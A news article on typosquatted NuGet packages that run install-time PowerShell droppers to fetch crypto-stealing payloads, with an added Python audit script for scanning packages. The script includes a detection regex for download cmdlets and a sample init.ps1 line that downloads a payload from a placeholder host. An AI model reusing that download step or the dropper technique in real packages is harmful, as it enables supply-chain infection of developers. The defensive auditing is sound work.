
Rogue NuGet Packages Infect .NET Developers with Crypto-Stealing Malware
2023-03-22 08:58

"The packages contained a PowerShell script that would execute upon installation and trigger a download of a 'second stage' payload, which could be remotely executed," JFrog researchers Natan Nehorai and Brian Moussalli said.

While NuGet packages have in the past been found to contain vulnerabilities and to be abused to propagate phishing links, the development marks the first-ever discovery of packages with malicious code.

The use of Coinbase and Discord underscores the continued reliance on typosquatting techniques, in which fake packages are assigned names that are similar to legitimate packages, in order to trick developers into downloading them.

The malware incorporated within the software packages functions as a dropper script and is designed to automatically run PowerShell code that retrieves a follow-on binary from a hard-coded server.

As an added obfuscation mechanism, some packages did not embed a malicious payload directly, instead fetching it via another booby-trapped package as a dependency.
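A defender-side check for the two behaviours described above (a PowerShell script shipped inside the package, and a payload reached through a dependency), as an added example that is not code from the article or from JFrog. It assumes NuGet's convention of a zip archive holding a `.nuspec` manifest and scripts such as `tools/init.ps1`; the marker list, package names and host are constructed for illustration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Heuristic markers of a script that fetches remote content (assumed list, not from the article).
DOWNLOAD_MARKERS = re.compile(
    r"Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|DownloadFile|DownloadString|Start-BitsTransfer",
    re.IGNORECASE,
)

def audit_nupkg(data: bytes) -> dict:
    """Return PowerShell scripts, download-marker hits and declared dependencies of a .nupkg."""
    report = {"scripts": [], "download_hits": {}, "dependencies": []}
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            lower = name.lower()
            if lower.endswith((".ps1", ".psm1")):
                report["scripts"].append(name)
                text = pkg.read(name).decode("utf-8", errors="replace")
                hits = sorted({m.group(0).lower() for m in DOWNLOAD_MARKERS.finditer(text)})
                if hits:
                    report["download_hits"][name] = hits
            elif lower.endswith(".nuspec"):
                root = ET.fromstring(pkg.read(name))
                for el in root.iter():
                    # Match on the local name so any nuspec schema namespace works.
                    if el.tag.rsplit("}", 1)[-1] == "dependency" and el.get("id"):
                        report["dependencies"].append(el.get("id"))
    return report

def build_sample() -> bytes:
    """Constructed sample package: placeholder names and host, no real payload."""
    nuspec = (
        '<package xmlns="http://schemas.microsoft.com/packaging/2013/05/nuspec.xsd"><metadata>'
        "<id>Example.Typo.Package</id><version>1.0.0</version>"
        '<dependencies><dependency id="Example.Helper.Package" version="1.0.0" /></dependencies>'
        "</metadata></package>"
    )
    script = "Invoke-WebRequest -Uri 'https://stage2.example.invalid/p' -OutFile $env:TEMP\\p.bin\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Example.Typo.Package.nuspec", nuspec)
        z.writestr("tools/init.ps1", script)
        z.writestr("lib/net6.0/Example.dll", b"\x00")
    return buf.getvalue()

if __name__ == "__main__":
    print(audit_nupkg(build_sample()))
```

A hit is a reason to read the script, not a verdict. Run the same audit on every package listed under `dependencies`, since a clean-looking package can pull the script in from there.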

.NET developers using NuGet are still at high risk of malicious code infecting their environments and should take caution when curating open-source components for use in their builds - and at every step of the software development lifecycle - to ensure the software supply chain remains secure.


News URL

https://thehackernews.com/2023/03/rogue-nuget-packages-infect-net.html